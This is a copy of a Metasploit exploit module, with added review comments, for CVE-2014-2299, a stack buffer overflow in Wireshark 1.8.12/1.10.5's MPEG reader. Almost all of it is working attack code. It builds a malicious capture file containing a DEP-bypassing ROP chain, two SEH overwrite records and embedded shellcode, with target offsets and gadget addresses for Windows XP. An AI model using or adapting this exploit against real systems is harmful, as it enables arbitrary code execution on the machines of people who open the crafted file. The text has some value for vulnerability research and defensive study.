
Buffer overflow Wireshark 1.8.12/1.10.5

  1. X-SYSTEM
  2.  
  3.  
Vulnerability: stack buffer overflow in Wireshark 1.8.12 / 1.10.5 (wiretap/mpeg.c, CVE-2014-2299)
  5.  
  6.  
Script (Metasploit module):
  8.  
# Exploit Title: Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow
  11. # Date: 24/04/2014
  12. # Exploit Author: j0sm1
  13. # Vendor Homepage: www.wireshark.org
  14. # Software Link: http://wireshark.askapache.com/download/win32/all-versions/
# Version: <= 1.8.12 (1.8.x) / <= 1.10.5 (1.10.x) — matches the module's Name/Description below
  16. # Tested on: Windows XP SP3
# CVE : CVE-2014-2299
  18.  
  19. # Metasploit URL module:
  20. https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
  21.  
  22. #
# This module requires Metasploit: http://metasploit.com/download
  24. # Current source: https://github.com/rapid7/metasploit-framework
  25. ##
  26.  
  27. require 'msf/core'
  28.  
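##
# File-format exploit for CVE-2014-2299, a stack buffer overflow in
# Wireshark's wiretap/mpeg.c (MPEG audio reader). The module only writes a
# file (via Msf::Exploit::FILEFORMAT#file_create); nothing is sent over the
# network. Opening the file with a vulnerable Wireshark triggers the overflow.
#
# Layout of the generated file (built in #exploit):
#   magic_header | junk | NOP;RETN x2 | ROP chain | shellcode | junk |
#   nSEH/SEH (CLI open) | junk | nSEH/SEH (GUI open)
# Two SEH records are planted because the overwrite lands at a different
# offset depending on whether the file is opened from the command line
# ('OffSet') or from the GUI ('OffSet2').
#
# NOTE(review): the string literals below contain raw high bytes ("\xff",
# "\xe0", ...). Metasploit modules normally start with
# "# -*- coding: binary -*-" so that concatenating them with the binary
# strings returned by rand_text_alpha/make_nops cannot raise
# Encoding::CompatibilityError; confirm that magic comment is present at the
# top of the file.
##
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  # Registers module metadata, payload constraints, targets and options.
  #
  # @param info [Hash] metadata merged into the module by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',
      'Description'    => %q{
        This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
        by generating a malicious file.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Wesley Neelen', # Discovery vulnerability
          'j0sm1',         # Exploit and msf module
        ],
      'References'     =>
        [
          [ 'CVE', '2014-2299' ],
          [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],
          [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],
          [ 'URL', 'http://www.securityfocus.com/bid/66066/info' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          # 0xff must not appear in the encoded payload. The reason is not
          # stated by the original author; it presumably collides with the
          # MPEG frame-sync bytes (0xff 0xfb) used as magic_header in #exploit.
          # It also rules out backward jmp encodings (see #exploit).
          'BadChars'       => "\xff",
          'Space'          => 600,
          'DisableNops'    => true,
          # sub esp,0xc8 (200): executed before the shellcode, presumably to
          # move ESP away from the shellcode so its own pushes do not clobber
          # it while it runs from the stack.
          'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00"
        },
      'Platform'       => 'win',
      # Per-target values: 'OffSet' is the distance to the first (CLI) SEH
      # record, 'OffSet2' to the second (GUI) one. NOTE(review): 'Ret' and
      # 'jmpesp' are not read anywhere in #exploit, which hard-codes its own
      # SEH handler addresses; they are kept only for documentation.
      'Targets'        =>
        [
          [ 'WinXP SP3 Spanish (bypass DEP)',
            {
              'OffSet'  => 69732,
              'OffSet2' => 70476,
              'Ret'     => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16)
              'jmpesp'  => 0x68e2bfb9,
            }
          ],
          [ 'WinXP SP2/SP3 English (bypass DEP)',
            {
              'OffSet2' => 70692,
              'OffSet'  => 70476,
              'Ret'     => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module
              'jmpesp'  => 0x68e2bfb9,
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 20 2014'
    ))

    # The extension is cosmetic: the file content is MPEG audio data, and
    # wiretap presumably selects the mpeg.c reader from the magic bytes.
    register_options(
      [
        OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']),
      ], self.class)
  end

  # Builds the VirtualProtect ROP chain (generated with mona.py) that marks
  # the shellcode region executable and then transfers control to it.
  #
  # Register setup before PUSHAD, per the gadget comments: ESI = VirtualProtect
  # (read through its IAT slot in libcares-2.dll), EBP = "push esp # ret"
  # (the address VirtualProtect returns to, which presumably then jumps into
  # the shellcode that follows the chain), EBX = 0x201 (dwSize),
  # EDX = 0x40 (flNewProtect, PAGE_EXECUTE_READWRITE), ECX = a writable dword
  # (lpflOldProtect), EDI = RETN (ROP NOP), EAX = filler. PUSHAD pushes these
  # in order so that the following RETN ends up calling VirtualProtect with
  # that argument frame.
  #
  # All addresses are module-specific (libgtk-win32-2.0-0.dll 2.24.14.0,
  # zlib1.dll 1.2.5.0, libgnutls-26.dll, libgobject-2.0-0.dll, libcares-2.dll)
  # and assume those DLLs load at their preferred base (no ASLR on XP).
  #
  # @return [String] the chain packed as little-endian 32-bit dwords
  def create_rop_chain
    rop_gadgets = [
      0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll]
      0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x00000201, # 0x00000201 -> ebx (dwSize)
      0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]
      0x00000040, # 0x00000040 -> edx (flNewProtect)
      0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x668242b9, # &Writable location [libgnutls-26.dll] (lpflOldProtect)
      0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]
      0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x90909090, # nop (filler for EAX)
      0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
    ]
    rop_gadgets.flatten.pack("V*")
  end

  # Assembles the malicious MPEG file and writes it with file_create.
  #
  # @return [void]
  def exploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")

    ropchain  = create_rop_chain
    shellcode = payload.encoded

    # MPEG audio (MP3) frame sync + header bytes; this is what makes the file
    # reach the vulnerable mpeg.c reader.
    # -> http://en.wikipedia.org/wiki/MP3#File_structure
    magic_header = "\xff\xfb\x41"

    # Packet body: junk, two "NOP # RETN" gadgets (0x6c377d6c) that the SEH
    # handler's stack pivot presumably lands on, the ROP chain, the shellcode,
    # then junk up to the first SEH record.
    packet = rand_text_alpha(883)
    packet << "\x6c\x7d\x37\x6c" # NOP RETN
    packet << "\x6c\x7d\x37\x6c" # NOP RETN
    packet << ropchain
    packet << shellcode

    # NOTE(review): 892 is the original author's constant although the prefix
    # above is 883 + 4 + 4 = 891 bytes (and the 3-byte magic_header precedes
    # the packet in the file). The offsets were tuned together on the listed
    # targets, so none of them is "corrected" here in isolation.
    pad = target['OffSet'] - 892 - ropchain.length - shellcode.length
    # A negative length would not raise in rand_text_alpha but would silently
    # shift every later offset and leave the SEH records in the wrong place.
    if pad < 0
      fail_with(Failure::BadConfig, "Payload (#{shellcode.length} bytes) and ROP chain do not fit before the SEH record")
    end
    packet << rand_text_alpha(pad)

    # 0xff is a bad char, so a backward jump from the handler (e.g. jmp $-2000,
    # whose encoding contains 0xff bytes) cannot be used, and there is no room
    # after nSEH/SEH. Each handler is therefore a stack-pivot gadget
    # (ADD ESP,<n> ... RETN) that moves ESP back into the packet body above.
    # NOTE(review): both handler addresses are hard-coded and identical for
    # every target; they are not taken from target['Ret'].

    # SEH record hit when the file is opened from the command line.
    packet << make_nops(4)       # nSEH (make_nops honours BadChars)
    packet << "\x6c\x2e\xe0\x68" # SEH = 0x68e02e6c: ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN

    # Junk between the two records; 8 = the nSEH + SEH just written.
    packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8)

    # SEH record hit when the file is opened from the GUI.
    packet << make_nops(4)       # nSEH
    packet << "\x55\x59\x80\x6b" # SEH = 0x6b805955: ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [libjpeg-8.dll]

    print_status("Preparing payload")
    filecontent = magic_header + packet
    print_status("Writing payload to file, #{filecontent.length} bytes")
    file_create(filecontent)
  end
end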